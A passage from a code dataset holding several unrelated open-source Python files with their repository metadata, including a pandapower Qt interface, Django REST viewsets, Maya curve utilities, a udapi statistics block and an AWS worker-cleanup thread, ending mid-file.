self.build_bus.setObjectName("build_bus")
self.build_message = QtGui.QTextBrowser(self.build)
self.build_message.setGeometry(QtCore.QRect(10, 460, 221, 231))
self.build_message.setFrameShape(QtGui.QFrame.Box)
self.build_message.setObjectName("build_message")
self.build_ward = QtGui.QPushButton(self.build)
self.build_ward.setGeometry(QtCore.QRect(10, 330, 91, 31))
self.build_ward.setObjectName("build_ward")
self.build_measurement = QtGui.QPushButton(self.build)
self.build_measurement.setGeometry(QtCore.QRect(10, 420, 91, 31))
self.build_measurement.setObjectName("build_measurement")
self.build_sgen = QtGui.QPushButton(self.build)
self.build_sgen.setGeometry(QtCore.QRect(10, 120, 91, 31))
self.build_sgen.setObjectName("build_sgen")
self.build_switch = QtGui.QPushButton(self.build)
self.build_switch.setGeometry(QtCore.QRect(10, 60, 91, 31))
self.build_switch.setObjectName("build_switch")
self.build_trafo3w = QtGui.QPushButton(self.build)
self.build_trafo3w.setGeometry(QtCore.QRect(10, 210, 91, 31))
self.build_trafo3w.setObjectName("build_trafo3w")
self.build_gen = QtGui.QPushButton(self.build)
self.build_gen.setGeometry(QtCore.QRect(10, 240, 91, 31))
self.build_gen.setObjectName("build_gen")
self.build_lines = QtGui.QPushButton(self.build)
self.build_lines.setGeometry(QtCore.QRect(10, 30, 91, 31))
self.build_lines.setObjectName("build_lines")
self.build_ext_grid = QtGui.QPushButton(self.build)
self.build_ext_grid.setGeometry(QtCore.QRect(10, 150, 91, 31))
self.build_ext_grid.setObjectName("build_ext_grid")
self.build_trafo = QtGui.QPushButton(self.build)
self.build_trafo.setGeometry(QtCore.QRect(10, 180, 91, 31))
self.build_trafo.setObjectName("build_trafo")
self.build_load = QtGui.QPushButton(self.build)
self.build_load.setGeometry(QtCore.QRect(10, 90, 91, 31))
self.build_load.setObjectName("build_load")
self.build_dcline = QtGui.QPushButton(self.build)
self.build_dcline.setGeometry(QtCore.QRect(10, 390, 91, 31))
self.build_dcline.setObjectName("build_dcline")
self.build__xward = QtGui.QPushButton(self.build)
self.build__xward.setGeometry(QtCore.QRect(10, 360, 91, 31))
self.build__xward.setObjectName("build__xward")
self.tabWidget.addTab(self.build, "")
self.interpreter = QtGui.QWidget()
self.interpreter.setObjectName("interpreter")
self.verticalLayoutWidget_2 = QtGui.QWidget(self.interpreter)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(120, 30, 711, 561))
self.verticalLayoutWidget_2.setObjectName("verticalLayoutWidget_2")
self.interpreter_vbox = QtGui.QVBoxLayout(self.verticalLayoutWidget_2)
self.interpreter_vbox.setContentsMargins(0, 0, 0, 0)
self.interpreter_vbox.setObjectName("interpreter_vbox")
self.tabWidget.addTab(self.interpreter, "")
self.report = QtGui.QWidget()
self.report.setObjectName("report")
self.report_message = QtGui.QTextBrowser(self.report)
self.report_message.setGeometry(QtCore.QRect(80, 20, 851, 571))
self.report_message.setFrameShape(QtGui.QFrame.Box)
self.report_message.setObjectName("report_message")
self.tabWidget.addTab(self.report, "")
self.help = QtGui.QWidget()
self.help.setObjectName("help")
self.verticalLayoutWidget_3 = QtGui.QWidget(self.help)
self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(20, 20, 961, 581))
self.verticalLayoutWidget_3.setObjectName("verticalLayoutWidget_3")
self.verticalLayout_6 = QtGui.QVBoxLayout(self.verticalLayoutWidget_3)
self.verticalLayout_6.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.webView = QtWebKit.QWebView(self.verticalLayoutWidget_3)
self.webView.setUrl(QtCore.QUrl("http://pandapower.readthedocs.io/en/v1.3.0/"))
self.webView.setObjectName("webView")
self.verticalLayout_6.addWidget(self.webView)
self.tabWidget.addTab(self.help, "")
self.tab = QtGui.QWidget()
self.tab.setObjectName("tab")
self.tabWidget.addTab(self.tab, "")
self.verticalLayout.addWidget(self.tabWidget)
pandapower.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(pandapower)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1023, 21))
self.menubar.setObjectName("menubar")
pandapower.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(pandapower)
self.statusbar.setObjectName("statusbar")
pandapower.setStatusBar(self.statusbar)
self.retranslateUi(pandapower)
self.tabWidget.setCurrentIndex(4)
QtCore.QMetaObject.connectSlotsByName(pandapower)
def retranslateUi(self, pandapower):
pandapower.setWindowTitle(QtGui.QApplication.translate("pandapower", "pandapower", None, QtGui.QApplication.UnicodeUTF8))
self.main_save.setText(QtGui.QApplication.translate("pandapower", "Save Network", None, QtGui.QApplication.UnicodeUTF8))
self.main_losses.setText(QtGui.QApplication.translate("pandapower", "Losses Report", None, QtGui.QApplication.UnicodeUTF8))
self.main_load.setText(QtGui.QApplication.translate("pandapower", "Load Network", None, QtGui.QApplication.UnicodeUTF8))
self.main_solve.setText(QtGui.QApplication.translate("pandapower", "Solve (runpp)", None, QtGui.QApplication.UnicodeUTF8))
self.main_empty.setText(QtGui.QApplication.translate("pandapower", "Empty Network", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.main), QtGui.QApplication.translate("pandapower", "Main Menu", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_ext_grid.setText(QtGui.QApplication.translate("pandapower", "External Grid", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_xward.setText(QtGui.QApplication.translate("pandapower", "Extended Ward", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_load.setText(QtGui.QApplication.translate("pandapower", "Load", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_dcline.setText(QtGui.QApplication.translate("pandapower", "DC Line", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_shunt.setText(QtGui.QApplication.translate("pandapower", "Shunt", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_trafo.setText(QtGui.QApplication.translate("pandapower", "Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_trafo3w.setText(QtGui.QApplication.translate("pandapower", "3W-Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_gen.setText(QtGui.QApplication.translate("pandapower", "Generator", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_impedance.setText(QtGui.QApplication.translate("pandapower", "Impedance", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_sgen.setText(QtGui.QApplication.translate("pandapower", "Stat Gen", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_switch.setText(QtGui.QApplication.translate("pandapower", "Switch", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_measurement.setText(QtGui.QApplication.translate("pandapower", "Measurement", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_ward.setText(QtGui.QApplication.translate("pandapower", "Ward", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_lines.setText(QtGui.QApplication.translate("pandapower", "Lines", None, QtGui.QApplication.UnicodeUTF8))
self.inspect_bus.setText(QtGui.QApplication.translate("pandapower", "Bus", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.inspect), QtGui.QApplication.translate("pandapower", "Network Model", None, QtGui.QApplication.UnicodeUTF8))
self.html_show.setText(QtGui.QApplication.translate("pandapower", "HTML", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.html), QtGui.QApplication.translate("pandapower", "HTML Report", None, QtGui.QApplication.UnicodeUTF8))
self.res_impedance.setText(QtGui.QApplication.translate("pandapower", "Impedance", None, QtGui.QApplication.UnicodeUTF8))
self.res_shunt.setText(QtGui.QApplication.translate("pandapower", "Shunt", None, QtGui.QApplication.UnicodeUTF8))
self.res_xward.setText(QtGui.QApplication.translate("pandapower", "Extended Ward", None, QtGui.QApplication.UnicodeUTF8))
self.res_sgen.setText(QtGui.QApplication.translate("pandapower", "Stat Gen", None, QtGui.QApplication.UnicodeUTF8))
self.res_ward.setText(QtGui.QApplication.translate("pandapower", "Ward", None, QtGui.QApplication.UnicodeUTF8))
self.res_gen.setText(QtGui.QApplication.translate("pandapower", "Generator", None, QtGui.QApplication.UnicodeUTF8))
self.res_bus.setText(QtGui.QApplication.translate("pandapower", "Bus", None, QtGui.QApplication.UnicodeUTF8))
self.res_trafo.setText(QtGui.QApplication.translate("pandapower", "Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.res_ext_grid.setText(QtGui.QApplication.translate("pandapower", "External Grid", None, QtGui.QApplication.UnicodeUTF8))
self.res_lines.setText(QtGui.QApplication.translate("pandapower", "Lines", None, QtGui.QApplication.UnicodeUTF8))
self.res_trafo3w.setText(QtGui.QApplication.translate("pandapower", "3W-Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.res_dcline.setText(QtGui.QApplication.translate("pandapower", "DC Line", None, QtGui.QApplication.UnicodeUTF8))
self.res_load.setText(QtGui.QApplication.translate("pandapower", "Load", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.res), QtGui.QApplication.translate("pandapower", "Load Flow Results", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox.setTitle(QtGui.QApplication.translate("pandapower", "Mode", None, QtGui.QApplication.UnicodeUTF8))
self.create_bus.setText(QtGui.QApplication.translate("pandapower", "Create Bus", None, QtGui.QApplication.UnicodeUTF8))
self.create_line.setText(QtGui.QApplication.translate("pandapower", "Create Line", None, QtGui.QApplication.UnicodeUTF8))
self.create_trafo.setText(QtGui.QApplication.translate("pandapower", "Create Trafo", None, QtGui.QApplication.UnicodeUTF8))
self.create_edit_elements.setText(QtGui.QApplication.translate("pandapower", "Edit Elements", None, QtGui.QApplication.UnicodeUTF8))
self.create_ext_grid.setText(QtGui.QApplication.translate("pandapower", "Create Ext grid", None, QtGui.QApplication.UnicodeUTF8))
self.create_load.setText(QtGui.QApplication.translate("pandapower", "Create Load", None, QtGui.QApplication.UnicodeUTF8))
self.create_gen.setText(QtGui.QApplication.translate("pandapower", "Create Gen", None, QtGui.QApplication.UnicodeUTF8))
self.create_sgen.setText(QtGui.QApplication.translate("pandapower", "Create sGen", None, QtGui.QApplication.UnicodeUTF8))
self.build_shunt.setText(QtGui.QApplication.translate("pandapower", "Shunt", None, QtGui.QApplication.UnicodeUTF8))
self.build_impedance.setText(QtGui.QApplication.translate("pandapower", "Impedance", None, QtGui.QApplication.UnicodeUTF8))
self.build_bus.setText(QtGui.QApplication.translate("pandapower", "Bus", None, QtGui.QApplication.UnicodeUTF8))
self.build_ward.setText(QtGui.QApplication.translate("pandapower", "Ward", None, QtGui.QApplication.UnicodeUTF8))
self.build_measurement.setText(QtGui.QApplication.translate("pandapower", "Measurement", None, QtGui.QApplication.UnicodeUTF8))
self.build_sgen.setText(QtGui.QApplication.translate("pandapower", "Stat Gen", None, QtGui.QApplication.UnicodeUTF8))
self.build_switch.setText(QtGui.QApplication.translate("pandapower", "Switch", None, QtGui.QApplication.UnicodeUTF8))
self.build_trafo3w.setText(QtGui.QApplication.translate("pandapower", "3W-Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.build_gen.setText(QtGui.QApplication.translate("pandapower", "Generator", None, QtGui.QApplication.UnicodeUTF8))
self.build_lines.setText(QtGui.QApplication.translate("pandapower", "Lines", None, QtGui.QApplication.UnicodeUTF8))
self.build_ext_grid.setText(QtGui.QApplication.translate("pandapower", "External Grid", None, QtGui.QApplication.UnicodeUTF8))
self.build_trafo.setText(QtGui.QApplication.translate("pandapower", "Transformer", None, QtGui.QApplication.UnicodeUTF8))
self.build_load.setText(QtGui.QApplication.translate("pandapower", "Load", None, QtGui.QApplication.UnicodeUTF8))
self.build_dcline.setText(QtGui.QApplication.translate("pandapower", "DC Line", None, QtGui.QApplication.UnicodeUTF8))
self.build__xward.setText(QtGui.QApplication.translate("pandapower", "Extended Ward", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.build), QtGui.QApplication.translate("pandapower", "Add Elements", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.interpreter), QtGui.QApplication.translate("pandapower", "Interpreter", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.report), QtGui.QApplication.translate("pandapower", "Report", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.help), QtGui.QApplication.translate("pandapower", "Documentation", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), QtGui.QApplication.translate("pandapower", "About", None, QtGui.QApplication.UnicodeUTF8))
from PySide import QtWebKit
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
pandapower = QtGui.QMainWindow()
ui = Ui_pandapower()
ui.setupUi(pandapower)
pandapower.show()
sys.exit(app.exec_())
|
Tooblippe/pandapower_gui
|
resources/ui/builder.py
|
Python
|
bsd-3-clause
| 35,136
|
df2011 = data['2011'].dropna()
df2011.groupby(df2011.index.week)[['BETN029', 'BETR801']].quantile(0.95).plot()
|
jorisvandenbossche/2015-EuroScipy-pandas-tutorial
|
snippets/07 - Case study - air quality data64.py
|
Python
|
bsd-2-clause
| 110
|
# Standard imports
import unittest
import json
import logging
from datetime import datetime, timedelta
# Our imports
from emission.core.get_database import get_db, get_mode_db, get_section_db
from emission.analysis.result.precompute import precompute_results
from emission.core.wrapper.user import User
from emission.core.wrapper.client import Client
import emission.tests.common
from emission.clients.testclient import testclient
from emission.clients.data import data
logging.basicConfig(level=logging.DEBUG)
class TestPrecomputeResults(unittest.TestCase):
def setUp(self):
self.testUsers = ["test@example.com", "best@example.com", "fest@example.com",
"rest@example.com", "nest@example.com"]
self.serverName = 'localhost'
# Sometimes, we may have entries left behind in the database if one of the tests failed
# or threw an exception, so let us start by cleaning up all entries
emission.tests.common.dropAllCollections(get_db())
self.ModesColl = get_mode_db()
self.assertEquals(self.ModesColl.find().count(), 0)
self.SectionsColl = get_section_db()
self.assertEquals(self.SectionsColl.find().count(), 0)
emission.tests.common.loadTable(self.serverName, "Stage_Modes", "emission/tests/data/modes.json")
emission.tests.common.loadTable(self.serverName, "Stage_Sections", "emission/tests/data/testModeInferFile")
# Let's make sure that the users are registered so that they have profiles
for userEmail in self.testUsers:
User.register(userEmail)
self.now = datetime.now()
self.dayago = self.now - timedelta(days=1)
self.weekago = self.now - timedelta(weeks = 1)
for section in self.SectionsColl.find():
section['section_start_datetime'] = self.dayago
section['section_end_datetime'] = self.dayago + timedelta(hours = 1)
if (section['confirmed_mode'] == 5):
# We only cluster bus and train trips
# And our test data only has bus trips
section['section_start_point'] = {u'type': u'Point', u'coordinates': [-122.270039042, 37.8800285728]}
section['section_end_point'] = {u'type': u'Point', u'coordinates': [-122.2690412952, 37.8739578595]}
# print("Section start = %s, section end = %s" %
# (section['section_start_datetime'], section['section_end_datetime']))
# Replace the user email with the UUID
section['user_id'] = User.fromEmail(section['user_id']).uuid
self.SectionsColl.save(section)
self.pr = precompute_results.PrecomputeResults()
def testClientSpecificPrecompute(self):
for email in self.testUsers:
currUser = User.fromEmail(email)
self.assertEqual(currUser.getProfile().get("testfield1"), None)
self.assertEqual(currUser.getProfile().get("testfield2"), None)
self.assertEqual(data.getCarbonFootprint(currUser), None)
fakeEmail = "fest@example.com"
client = Client("testclient")
client.update(createKey = False)
emission.tests.common.makeValid(client)
(resultPre, resultReg) = client.preRegister("this_is_the_super_secret_id", fakeEmail)
user = User.fromEmail(fakeEmail)
self.assertEqual(user.getFirstStudy(), 'testclient')
self.pr.precomputeResults()
self.assertEqual(user.getProfile()['testfield1'], 'value1')
self.assertEqual(user.getProfile()['testfield2'], 'value2')
for email in self.testUsers:
if email != fakeEmail:
currUser = User.fromEmail(email)
carbonFootprint = data.getCarbonFootprint(currUser)
self.assertEqual(len(carbonFootprint), 12)
if __name__ == '__main__':
unittest.main()
|
joshzarrabi/e-mission-server
|
emission/tests/analysisTests/result_precompute/TestPrecomputeResults.py
|
Python
|
bsd-3-clause
| 3,850
|
"""
ViewSets are essentially just a type of class based view, that doesn't provide
any method handlers, such as `get()`, `post()`, etc... but instead has actions,
such as `list()`, `retrieve()`, `create()`, etc...
Actions are only bound to methods at the point of instantiating the views.
user_list = UserViewSet.as_view({'get': 'list'})
user_detail = UserViewSet.as_view({'get': 'retrieve'})
Typically, rather than instantiate views from viewsets directly, you'll
register the viewset with a router and let the URL conf be determined
automatically.
router = DefaultRouter()
router.register(r'users', UserViewSet, 'user')
urlpatterns = router.urls
"""
from __future__ import unicode_literals
from functools import update_wrapper
from django.utils.decorators import classonlymethod
from django.views.decorators.csrf import csrf_exempt
from rest_framework import views, generics, mixins
class ViewSetMixin(object):
"""
This is the magic.
Overrides `.as_view()` so that it takes an `actions` keyword that performs
the binding of HTTP methods to actions on the Resource.
For example, to create a concrete view binding the 'GET' and 'POST' methods
to the 'list' and 'create' actions...
view = MyViewSet.as_view({'get': 'list', 'post': 'create'})
"""
@classonlymethod
def as_view(cls, actions=None, **initkwargs):
"""
Because of the way class based views create a closure around the
instantiated view, we need to totally reimplement `.as_view`,
and slightly modify the view function that is created and returned.
"""
# The suffix initkwarg is reserved for identifying the viewset type
# eg. 'List' or 'Instance'.
cls.suffix = None
# actions must not be empty
if not actions:
raise TypeError("The `actions` argument must be provided when "
"calling `.as_view()` on a ViewSet. For example "
"`.as_view({'get': 'list'})`")
# sanitize keyword arguments
for key in initkwargs:
if key in cls.http_method_names:
raise TypeError("You tried to pass in the %s method name as a "
"keyword argument to %s(). Don't do that."
% (key, cls.__name__))
if not hasattr(cls, key):
raise TypeError("%s() received an invalid keyword %r" % (
cls.__name__, key))
def view(request, *args, **kwargs):
self = cls(**initkwargs)
# We also store the mapping of request methods to actions,
# so that we can later set the action attribute.
# eg. `self.action = 'list'` on an incoming GET request.
self.action_map = actions
# Bind methods to actions
# This is the bit that's different to a standard view
for method, action in actions.items():
handler = getattr(self, action)
setattr(self, method, handler)
# Patch this in as it's otherwise only present from 1.5 onwards
if hasattr(self, 'get') and not hasattr(self, 'head'):
self.head = self.get
# And continue as usual
return self.dispatch(request, *args, **kwargs)
# take name and docstring from class
update_wrapper(view, cls, updated=())
# and possible attributes set by decorators
# like csrf_exempt from dispatch
update_wrapper(view, cls.dispatch, assigned=())
# We need to set these on the view function, so that breadcrumb
# generation can pick out these bits of information from a
# resolved URL.
view.cls = cls
view.suffix = initkwargs.get('suffix', None)
return csrf_exempt(view)
def initialize_request(self, request, *args, **kwargs):
"""
Set the `.action` attribute on the view,
depending on the request method.
"""
request = super(ViewSetMixin, self).initialize_request(request, *args, **kwargs)
self.action = self.action_map.get(request.method.lower())
return request
class ViewSet(ViewSetMixin, views.APIView):
"""
The base ViewSet class does not provide any actions by default.
"""
pass
class GenericViewSet(ViewSetMixin, generics.GenericAPIView):
"""
The GenericViewSet class does not provide any actions by default,
but does include the base set of generic view behavior, such as
the `get_object` and `get_queryset` methods.
"""
pass
class ReadOnlyModelViewSet(mixins.RetrieveModelMixin,
mixins.ListModelMixin,
GenericViewSet):
"""
A viewset that provides default `list()` and `retrieve()` actions.
"""
pass
class ModelViewSet(mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.ListModelMixin,
GenericViewSet):
"""
A viewset that provides default `create()`, `retrieve()`, `update()`,
`partial_update()`, `destroy()` and `list()` actions.
"""
pass
|
ramcn/demo3
|
venv/lib/python3.4/site-packages/rest_framework/viewsets.py
|
Python
|
mit
| 5,303
|
import logging
logging.basicConfig()
logger = logging.getLogger(__name__)
import sys
import maya.cmds as cmds
import constants as const
def buildCurve(name):
## Bail out if a node with the name already exists
if cmds.objExists(name):
logger.warning('Curve name already exists in scene. Please pick a unique name!')
return
if name not in const.CURVES.keys():
logger.warning('Curve name not found in CURVEPOINTSDICT!')
return
curve = cmds.curve(name = name, d = const.CURVES[name]['d'], p = const.CURVES[name]['points'])
return curve
def buildCircle(name):
cmds.circle(name = name, c =(0, 0, 0), nr = (0, 1, 0), sw = 360, r = 1, d = 3, ut = 0, tol = 0.0001, s = 8, ch = False)
getShape = cmds.listRelatives(name, shapes = True)
cmds.rename(getShape[0], '{}Shape'.format(name))
return name
def printCurvePoints():
"""
Use: For printing to the console or write out to a file, the points of a new custom curve.
This can be added to the curve Dictionary for quickly building more curves for all rigging tools using the curve Dictionary.
@param toFile: if you would like to output the points to a text file in your home folder or not
@type toFile: Boolean
"""
curvePoints = []
curSel = cmds.ls(sl = True)
if not curSel:
cmds.warning('Nothing selected for export.')
pass
else:
for nurbsCurve in curSel:
getDegree = cmds.getAttr(nurbsCurve + '.degree')
getSpans = cmds.getAttr(nurbsCurve + '.spans')
numPoints = int(getDegree) + int(getSpans)
for x in range (numPoints):
getWS = cmds.xform(nurbsCurve + '.cv[%s]' % x, query = True, t = True, ws = True)
tempVar = []
for p in getWS:
tempVar.append("{0:.2f}".format(p))
curvePoints.append(tempVar)
tempVar = []
numKnots = numPoints + getDegree -1
sys.stdout.write('cmds.curve(name = "' + str(curSel[0]) + '", d = ' + str(getDegree) + ', p = ' + str(curvePoints) + ')')
|
jamesbdunlop/defaultMayaLibrary
|
nodes/curves.py
|
Python
|
apache-2.0
| 2,112
|
import time
import sys
from AppKit import *
class Converter (NSObject):
def convertAmount(self, amt, rate):
return amt*rate
class ConverterController (NSObject):
# First define the IB Outlets, the 'ivar' calls below define new
# instance variables in the objective-C class (e.g. visible
# for introspection in objective-C)
converter = objc.IBOutlet()
dollarField = objc.IBOutlet()
rateField = objc.IBOutlet()
totalField = objc.IBOutlet()
def awakeFromNib(self):
# Provide some defaults for the user...
self.dollarField.setFloatValue_(2.0)
self.rateField.setFloatValue_(3.0)
@objc.IBAction
def convert_(self, sender):
rate = self.rateField.floatValue()
amt = self.dollarField.floatValue()
total = self.converter.convertAmount(rate, amt)
self.totalField.setFloatValue_(total)
self.rateField.selectText_(self)
#x = NSRunAlertPanel("Calculation Result",
# "The result is %s"%(total), "OK", None, None)
sys.exit(NSApplicationMain(sys.argv))
|
albertz/music-player
|
mac/pyobjc-framework-Cocoa/Examples/AppKit/CurrencyConverter/CurrencyConverter.py
|
Python
|
bsd-2-clause
| 1,082
|
"""Block util.See prints statistics about the nodes matching a given condition.
Example usage from the command line::
udapy util.See node='node.is_nonprojective()' n=3 \
stats=dir,children,c_upos,p_lemma,deprel,feats_split < in.conllu
Example output::
node.is_nonprojective()
matches 245 out of 35766 nodes (0.7%) in 174 out of 1478 trees (11.8%)
=== dir (2 values) ===
right 193 78% delta=+37%
left 52 21% delta=-33%
=== children (9 values) ===
0 64 26% delta=-38%
2 58 23% delta=+14%
3 38 15% delta= +7%
=== c_upos (15 values) ===
NOUN 118 23% delta= +4%
DET 61 12% delta= -3%
PROPN 47 9% delta= +1%
=== p_lemma (187 values) ===
il 5 2% delta= +1%
fonction 4 1% delta= +1%
écrire 4 1% delta= +1%
=== deprel (22 values) ===
appos 41 16% delta=+15%
conj 41 16% delta=+13%
punct 36 14% delta= +4%
=== feats_split (20 values) ===
Number=Sing 114 21% delta= +2%
Gender=Masc 81 15% delta= +3%
_ 76 14% delta= -6%
In addition to absolute counts for each value, the percentage within matching nodes is printed
and a delta relative to percentage within all nodes.
This helps to highlight what is special about the matching nodes.
"""
from collections import Counter
import re # may be useful in eval, thus pylint: disable=unused-import
from udapi.core.block import Block
STATS = 'dir,edge,depth,children,siblings,p_upos,p_lemma,c_upos,form,lemma,upos,deprel,feats_split'
# We need eval in this block
# pylint: disable=eval-used
class See(Block):
"""Print statistics about the nodes specified by the parameter `node`."""
def __init__(self, node, n=5, stats=STATS, **kwargs):
"""Args:
`node`: Python expression to be evaluated for each node and if True,
the node will be considered "matching".
`n`: Top n values will be printed for each statistic.
`stats`: a list of comma-separated statistics to be printed.
A statistic can be an attribute (`form`, `lemma`) or a pseudo-attribute
(`depth` = depth of a node in dependency tree,
`children` = number of children nodes,
`p_lemma` = lemma of a parent node, etc).
See `udapi.core.Node.get_attrs` for a full list of statistics.
"""
super().__init__(**kwargs)
self.node = node
self.n_limit = n
self.stats = stats.split(',')
self.match = dict()
self.every = dict()
for stat in self.stats:
self.match[stat] = Counter()
self.every[stat] = Counter()
self.overall = Counter()
def process_tree(self, root):
self.overall['trees'] += 1
tree_match = False
for node in root.descendants:
matching = self.process_node(node)
self.overall['nodes'] += 1
if matching:
self.overall['matching_nodes'] += 1
if not tree_match:
self.overall['matching_trees'] += 1
tree_match = True
def process_node(self, node):
matching = eval(self.node)
for stat in self.stats:
for value in node.get_attrs([stat], undefs=''):
self.every[stat][value] += 1
self.every[stat]['T O T A L'] += 1
if matching:
self.match[stat][value] += 1
self.match[stat]['T O T A L'] += 1
return matching
def process_end(self):
print(self.node)
print("matches %d out of %d nodes (%.1f%%) in %d out of %d trees (%.1f%%)"
% (self.overall['matching_nodes'],
self.overall['nodes'],
self.overall['matching_nodes'] * 100 / self.overall['nodes'],
self.overall['matching_trees'],
self.overall['trees'],
self.overall['matching_trees'] * 100 / self.overall['trees']))
for stat in self.stats:
vals = len(self.match[stat].keys()) - 1
print("=== %s (%d value%s) ===" % (stat, vals, 's' if vals > 1 else ''))
match_total = self.match[stat]['T O T A L'] or 1
every_total = self.every[stat]['T O T A L'] or 1
for value, match_count in self.match[stat].most_common(self.n_limit + 1):
if value == 'T O T A L':
continue
every_count = self.every[stat][value]
match_perc = 100 * match_count / match_total
every_perc = 100 * every_count / every_total
print("%15s %5d %3d%% delta=%+3d%%"
% (value, match_count, match_perc, match_perc - every_perc))
|
udapi/udapi-python
|
udapi/block/util/see.py
|
Python
|
gpl-3.0
| 4,850
|
import json
import logging
from logging.config import dictConfig
import threading
import pickle
import redis
import aws
from settings import Settings
def terminate_worker(worker_id, instance, client):
result = aws.terminate_machine(instance)
if result is None or len(result) == 0:
logging.error('could not remove worker %s, remove manually!' % instance)
client.delete(worker_id)
class Consuela(threading.Thread):
""" Manages the termination of machines """
def __init__(self):
with open('logging.json') as jl:
dictConfig(json.load(jl))
logging.info('Consuela: Starting.')
threading.Thread.__init__(self)
self.daemon = True
self.settings = Settings()
self.client = redis.Redis('db')
self.job_pub_sub = self.client.pubsub()
self.job_pub_sub.subscribe(['jobs'])
def run(self):
for item in self.job_pub_sub.listen():
job_id = item['data']
if job_id == 'KILL':
self.job_pub_sub.unsubscribe()
logging.info('Consuela: Stopping.')
return
#
worker_id, worker = self.get_worker(job_id)
if worker and self.client.exists(job_id):
job = pickle.loads(self.client.get(job_id))
if job.state == 'finished' and worker.instance is not None:
if not self.settings.recycle_workers:
logging.info('recycle workers off, %s finished, shutting down machine' % worker.instance)
terminate_worker(worker_id, worker.instance, self.client)
else:
if self.recycle_worker(job_id, job):
logging.info('going to recycle worker %s' % worker.instance)
worker.job_id = None
self.client.set(worker_id, pickle.dumps(worker))
else:
logging.info('no work left for %s, shutting down machine' % worker.instance)
terminate_worker(worker_id, worker.instance, self.client)
elif job.state == 'failed' and worker.instance is not None:
logging.warning('%s finished with failure' % job_id)
if self.settings.auto_remove_failed and not self.settings.recycle_workers:
logging.info('auto-remove on failure enabled, trying to remove %s' % worker.instance)
terminate_worker(worker_id, worker.instance, self.client)
else:
logging.warning('auto-remove on failure not performed, manually remove %s!' % worker.instance)
elif job.state == 'broken' and worker.instance is not None:
logging.info('Terminating worker with a broken job.')
terminate_worker(worker_id, worker.instance, self.client)
job.state = 'failed'
self.client.set(job_id, pickle.dumps(job))
elif worker_id and worker and worker.instance:
terminate_worker(worker_id, worker.instance, self.client)
else:
logging.debug('no worker found for %s' % job_id)
def get_worker(self, job_id):
for worker_id in [worker_key for worker_key in self.client.keys() if worker_key.startswith('jm-')]: # Redis keys(pattern='*') does not filter at all.
pickled_worker = self.client.get(worker_id)
if pickled_worker is None:
continue
worker = pickle.loads(pickled_worker)
if worker.job_id is not None and worker.job_id == job_id:
return worker_id, worker
return None, None
def recycle_worker(self, job_id, job):
if job.batch_id is None or not self.client.exists(job.batch_id):
logging.info('could not find a "real" batch id for %s' % job.batch_id)
return False
batch = pickle.loads(self.client.get(job.batch_id))
for batch_job_id in pickle.loads(batch.jobs):
logging.debug('have job %s in batch %s' % (batch_job_id, job.batch_id))
if batch_job_id != job_id:
logging.debug('found other job in batch, checking state')
if self.client.exists(batch_job_id):
batch_job = pickle.loads(self.client.get(batch_job_id))
logging.debug('state is %s (for %s)' % (batch_job.state, batch_job_id))
if batch_job.state == 'spawned' or batch_job.state == 'received' or batch_job.state == 'delayed':
return True
return False
|
witlox/dcs
|
controller/ilm/consuela.py
|
Python
|
gpl-2.0
| 4,723
|
from django.conf import settings
from django.db.models import Count, F, Q
from django_filters.rest_framework.backends import DjangoFilterBackend
from geotrek.api.mobile.serializers import trekking as api_serializers_trekking
from geotrek.api.mobile.serializers import tourism as api_serializers_tourism
from geotrek.api.v2.functions import Transform, Length, StartPoint, EndPoint
from geotrek.trekking import models as trekking_models
from rest_framework_extensions.mixins import DetailSerializerMixin
from rest_framework.permissions import AllowAny
from rest_framework import response
from rest_framework import viewsets
from rest_framework import decorators
class TrekViewSet(DetailSerializerMixin, viewsets.ReadOnlyModelViewSet):
filter_backends = (DjangoFilterBackend,)
serializer_class = api_serializers_trekking.TrekListSerializer
serializer_detail_class = api_serializers_trekking.TrekDetailSerializer
filterset_fields = ('difficulty', 'themes', 'networks', 'practice')
permission_classes = [AllowAny, ]
def get_queryset(self, *args, **kwargs):
lang = self.request.LANGUAGE_CODE
queryset = trekking_models.Trek.objects.existing()\
.select_related('topo_object') \
.prefetch_related('topo_object__aggregations', 'attachments') \
.order_by('pk').annotate(length_2d_m=Length('geom'))
if not self.action == 'list':
